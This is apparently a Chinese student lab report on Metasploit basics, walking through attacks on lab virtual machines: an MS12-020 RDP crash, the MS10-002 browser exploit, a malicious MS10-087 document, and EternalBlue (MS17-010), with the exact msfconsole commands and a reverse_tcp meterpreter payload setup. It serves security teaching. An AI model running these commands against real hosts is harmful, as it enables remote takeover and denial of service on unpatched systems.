基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit漏洞利用,一般出现漏洞后,根据一些大佬们给出的POC尝试去进行漏洞利用。
  • payload攻击负载,是我们exploit中shellcode中的主要功能代码。

  • encode编码,是我们用来修改字符,达到免杀效果的。

实践过程

MS12-020漏洞攻击

  • 该漏洞利用远程桌面的漏洞进行攻击,所以需要靶机系统打开远程桌面功能。
  • 在kali输入msfconsole进入msf终端,接着在msf终端中使用search功能搜索ms12-020,发现有两个可用模块:

  • 使用use auxiliary/dos/windows/rdp/ms12_020_maxchannelids命令选定要利用的模块并查看需要填写的参数,这里需要填写靶机ip。

  • 最后输入命令“run”,执行我们的auxiliary攻击模块:

  • 靶机系统受到攻击后蓝屏

MS10-002漏洞攻击

  • 微软关于MS10-002漏洞的安全公告:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-002
  • 该模块针对浏览器包括IE6、IE7、IE8,我们的靶机符合要求。
  • 在kali输入msfconsole进入msf终端,接着在msf终端中使用search功能搜索ms10-002,发现有两个可用模块:

  • 使用use windows/browser/ms10_002_aurora命令来使用第一个模块,并利用show options来查看我们需要修改的参数。

  • 这里最后失败了,我去查看与此渗透攻击模块相关的详细信息。
  • 从其描述(Description)中可以看到,此模块只有在IE6中才能可靠地运行,真的坑,微软官方说这个漏洞在IE6、IE7、IE8明明都可以的,这里我们去装xp的虚拟机,装好继续。
  • 设置SRVHOST(攻击主机IP地址)、LHOST(监听主机的IP)、URIPATH(URI路径)
  • 在靶机中输入此URL

  • 此时kali主机metasploit控制台终端中可看到已经有目标主机上线,会话已经建立

  • 在meterpreter接入会话:sessions -i 4,查看系统信息,攻击成功。

MS10-087漏洞攻击

  • 微软关于MS10-087漏洞的安全公告:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-087

  • 进入MSF终端后查找MS10-087漏洞的攻击模块,设置攻击载荷

  • 查看options中需要设置的选项

  • 这里我们生成一个FILENAME为:20154327.doc的恶意文档,然后设置CMD的执行内容,这里设置为弹出一个注册表。

  • 我们在/root/.msf4/local/目录下找到了20154327.doc文件,这个.msf4目录是默认隐藏的

  • 将生成的文件拷贝到靶机上,双击运行,结果成功弹出注册表,当然也可以根据自己的实际需求执行其他的命令.

MSF中使用永恒之蓝(ms17-010)

  • 2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震,因为已经很久没有出现过像MS17-010这种级别的漏洞了。
  • 学习了上面的内容后,我对这个大名鼎鼎的漏洞产生了兴趣,下面开始尝试进攻。

  • 先去github找到了这个模块,地址https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

  • 攻击机器:kali 64
  • 目标机器:windows 7 64位

  • 首先我们把模块下载到对应的目录(kali下metasploit存放模块的目录是/usr/share/metasploit-framework/modules/)
    cd /usr/share/metasploit-framework/modules/exploits/windows/smb/
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

  • 这里模块引用了一个ruby_smb的插件,所以我们需要安装这个插件。

  • 安装的命令:gem install ruby_smb

  • 顺便升级一下msf,执行apt-get update,获取更新列表
  • 执行apt-get install metasploit-framework,这里时间比较久,渣渣校园网,耐心等待吧。

  • 升级完成之后,我们启动msf,并选择该模块。
    msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"
    info

  • 设置目标系统的IP和payload。
    set RHOST 172.30.3.35
    set payloadwindows/x64/meterpreter/reverse_tcp
    set LHOST 172.30.1.159
  • exploit开始攻击,攻击成功。

实践总结与体会

  • 这次的实验让我感到身边完全不安全了,基本上什么都不需要,通过扫描,查看是否存在相应的漏洞,利用漏洞进行渗透测试,靶机什么都不知道的情况下就会被控制,不像之前还需要通过诱导对方打开文件,及时打补丁真的很重要。
  • 其次这次过程中没有按照老师所给出的漏洞进行渗透攻击,自己去网上找了三个常规的漏洞和一个自己感兴趣的漏洞加以利用,根据别人给出的poc,去进行exp,这个探索的过程相对于成功与否的结果而言更为有趣。

20154327 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. February 14 2017 Week 7 Tuesday

    Love lives in cottages as well as in courts. 爱情无贵贱,贫富皆有之. Many people, especially boys, complain tha ...

  2. 475. Heaters (start binary search, appplication for binary search)

    Winter is coming! Your first job during the contest is to design a standard heater with fixed warm r ...

  3. Could not publish to the server. null argument:

    启动tomcat或clean tomcat报错:Could not publish to the server. null argument: Could not publish to the ser ...

  4. swift菜鸟入门视频教程-02-基本运算符

    版权声明:本文为博主原创文章,未经博主同意不得转载. https://blog.csdn.net/mengxiangyue/article/details/32435435 本人自己录制的swift菜 ...

  5. Struts2注解 及 约定优于配置

    Struts2注解 1 Struts2注解的作用 使用注解可以用来替换struts.xml配置文件!!! 2 导包 必须导入struts2-convention-plugin-2.3.15.jar包, ...

  6. php 统计二维数组中某个相等值的总个数,并且组合成一个新的数组 转发

    $ar = array(   array( 'sv_id' => 1, 'mid' => 1, 'sv_question1' => 20 ),   array( 'sv_id' =& ...

  7. 截屏快捷键(windows)自带截屏,不需要安装任何插件

    方案一:电脑自带截屏,不需要QQ Shift+win+s即可截图(推荐使用) 方案二:搜狗输入法下载自带:Ctrl+Shift+x

  8. STM32之关闭JTAG

    1.有些时候不想用JTAG口(而用SWJ在线调试),把JTAG暂用的IO通过remap出来使用 2.比如48 pin的STM32F103CBT6单片机: GPIO_PinRemapConfig(GPI ...

  9. Oracle安装时出错,TNS-04612 :"XXX"的RHS 为空

    安装Oracle11g时到最后一步,一直出现 “Oracle Net Configuration Assistant 失败” 试了好多次一直都没成功,在日志文件中的找到这几个错误: TNS-04404 ...

  10. 纯 js 实现跨域接口调用 jsonp

    开发「bufpay.com 个人即时到账收款平台」的时候,支付页面需要 poll轮询 查询订单状态. bufpay 支付接口如下: 接口地址:https://bufpay.com/api/pay/ai ...